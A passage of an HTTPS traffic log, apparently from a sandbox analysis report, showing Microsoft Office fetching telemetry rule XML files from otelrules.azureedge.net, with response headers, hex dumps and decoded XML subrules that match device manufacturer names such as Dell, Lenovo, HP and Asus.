                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:32 UTC515INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 2980
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                        x-ms-request-id: 63a77e6f-f01e-0052-2825-499224000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124932Z-r1cf579d778n9656hC1EWRqns000000000pg0000000045vk
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:32 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        8192.168.2.84972613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:32 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 450
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                        x-ms-request-id: c11b12be-901e-0048-4704-48b800000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124932Z-r1cf579d778w59f9hC1EWRze6w00000008rg000000001d9g
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:32 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        9192.168.2.84973013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:32 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 408
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                        x-ms-request-id: 75167780-601e-000d-444b-492618000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124932Z-r1cf579d7782v2q5hC1EWRt9bw000000036g000000001vh2
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:32 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        10192.168.2.84973213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:34 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 474
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                        x-ms-request-id: 1496b81c-e01e-0003-0d90-490fa8000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124934Z-r1cf579d7789trgthC1EWRkkfc0000000930000000004ua8
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:34 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        11192.168.2.84973313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:34 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 415
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                        x-ms-request-id: 9879796e-101e-0034-5802-4896ff000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124934Z-r1cf579d7788pwqzhC1EWRrpd800000008sg000000000d8a
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        12192.168.2.84973413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:34 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 471
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                        x-ms-request-id: 3de6f1c3-b01e-003d-6e01-48d32c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124934Z-r1cf579d778t5c2lhC1EWRce3w000000093g000000003syf
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:34 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        13192.168.2.84973513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:34 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 632
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                        x-ms-request-id: 1e9ba10d-901e-0029-2907-48274a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124934Z-r1cf579d778qgtz2hC1EWRmgks00000008ag000000000ahh
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:34 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        14192.168.2.84973613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:34 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 467
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                        x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124934Z-r1cf579d778lntp7hC1EWR9gg400000007qg000000009apx
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:34 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        15192.168.2.84974013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:36 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 427
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                        x-ms-request-id: d7cfe8f1-f01e-003f-6fc8-49d19d000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124936Z-r1cf579d778469knhC1EWR2gqc000000010g000000008xzc
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:37 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        16192.168.2.84973813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:36 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 407
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                        x-ms-request-id: 28fd3814-401e-0015-0be2-490e8d000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124936Z-r1cf579d778t76vqhC1EWRdx4w0000000290000000007kzs
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:37 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        17192.168.2.84974213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:36 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 407
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                        x-ms-request-id: c753bf19-701e-0050-46aa-496767000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124936Z-r1cf579d778t76vqhC1EWRdx4w00000002c0000000004ud5
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
